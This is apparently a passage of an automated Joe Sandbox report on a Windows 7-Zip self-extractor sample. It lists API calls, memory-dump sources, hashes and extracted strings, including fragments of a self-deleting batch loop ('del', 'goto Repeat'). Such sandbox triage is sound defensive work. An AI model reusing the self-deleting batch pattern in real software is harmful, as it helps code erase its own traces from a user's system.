                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                • API String ID: 3007203151-3467708659
                                                                                                • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                                • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                                                • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                                • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                                                APIs
                                                                                                • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                • _wtol.MSVCRT ref: 004047DC
                                                                                                • _wtol.MSVCRT ref: 004047F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                                                • API String ID: 2725485552-3187639848
                                                                                                • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                                • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                                                • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                                • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                                                APIs
                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                                                • GetParent.USER32(?), ref: 00402E2E
                                                                                                • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                                                • GetMenu.USER32(?), ref: 00402E55
                                                                                                • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                                                • DestroyWindow.USER32(?), ref: 00402EA3
                                                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                                                • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                • API String ID: 1731037045-2281146334
                                                                                                • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                                • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                                                APIs
                                                                                                • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3462224810-0
                                                                                                • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                                                • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                                                APIs
                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                                                • GetMenu.USER32(?), ref: 00401E44
                                                                                                  • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                  • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                  • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                  • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                                                • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                                                • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                                                  • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                  • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                  • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                  • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                  • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                  • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                  • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                  • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                                                • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                                                • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                • String ID: IMAGES$STATIC
                                                                                                • API String ID: 4202116410-1168396491
                                                                                                • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                                • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                                APIs
                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                                • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                                • SetFocus.USER32(00000000), ref: 0040821D
                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                                                • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                                • IsWindow.USER32(00000000), ref: 00408297
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                                • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                                • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                                  • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                                  • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                  • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                  • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                  • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                                  • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 855516470-0
                                                                                                • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                                • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                                • strncmp.MSVCRT ref: 004031F1
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                                • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                                • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$lstrcmpstrncmp
                                                                                                • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                                • API String ID: 2881732429-172299233
                                                                                                • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                                • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                                                • GetParent.USER32(?), ref: 00406B43
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                                                • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                                                • GetClientRect.USER32(?,?), ref: 00406C55
                                                                                                • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                                                  • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                                                  • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 747815384-0
                                                                                                • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                                                • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                • LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                • LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                                                • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                                                • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                                                • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
